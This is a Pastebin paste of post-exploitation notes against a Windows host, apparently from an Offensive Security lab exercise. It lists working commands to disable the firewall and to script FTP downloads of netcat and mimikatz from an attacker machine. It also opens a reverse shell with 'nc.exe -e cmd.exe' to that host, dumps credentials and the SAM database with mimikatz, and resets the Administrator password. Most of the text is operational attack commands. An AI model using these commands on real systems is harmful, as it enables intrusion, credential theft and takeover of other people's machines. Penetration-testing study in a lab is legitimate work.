Guest User

Untitled

a guest
Mar 22nd, 2019
52
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.56 KB | None | 0 0
  1. ## Post exploitation
  2.  
  3. 192.168.66.112
  4.  
  5. • Disabled the target firewall:
  6. • netsh firewall set opmode disable
  7. • Used the pre-installed Windows FTP client to upload netcat (nc.exe) and mimikatz to .12
  8. • Then used nc.exe to create a redundant shell indpendent of the exploited process and used mimikatz to dump the credentials for .12
  9. • Used the following commands (via the reverse shell) to download nc.exe and mimikatz.exe to .12
  10.  
  11. echo open 192.168.66.31> ftp_get_nc.txt
  12. echo USER offsec>> ftp_get_nc.txt
  13. echo ftp>> ftp_get_nc.txt
  14. echo bin >> ftp_get_nc.txt
  15. echo GET nc.exe >> ftp_get_nc.txt
  16. echo bye >> ftp_get_nc.txt
  17.  
  18. ftp -v -n -s:ftp_get_nc.txt
  19.  
  20. --------------------------------------------------------------------------------
  21.  
  22.  
  23. echo open 192.168.66.31> ftp_get_mimikatz.txt
  24. echo USER offsec>> ftp_get_mimikatz.txt
  25. echo ftp>> ftp_get_mimikatz.txt
  26. echo bin >> ftp_get_mimikatz.txt
  27. echo GET mimikatz.exe >> ftp_get_mimikatz.txt
  28. echo bye >> ftp_get_mimikatz.txt
  29.  
  30. ftp -v -n -s:ftp_get_mimikatz.txt
  31.  
  32. • Used the following commands to spawn a shell which was independent of the exploited process
  33.  
  34. start cmd /c nc.exe -nv 192.168.66.31 413 -e cmd.exe
  35.  
  36. • Used the following mimikatz commands to dump user credentials, elevate privileges, and dump the SAM database (in that order)
  37. • privilege::debug
  38. • sekurlsa::logonpasswords
  39. • token::elevate
  40. • lsadump::sam
  41. • Used following command to change password of the Administrator account:
  42. • lsadump::changentlm /user:Administrator /old:31d6cfe0d16ae931b73c59d7e0c089c0 /newpassword:Administrator
Add Comment
Please, Sign In to add comment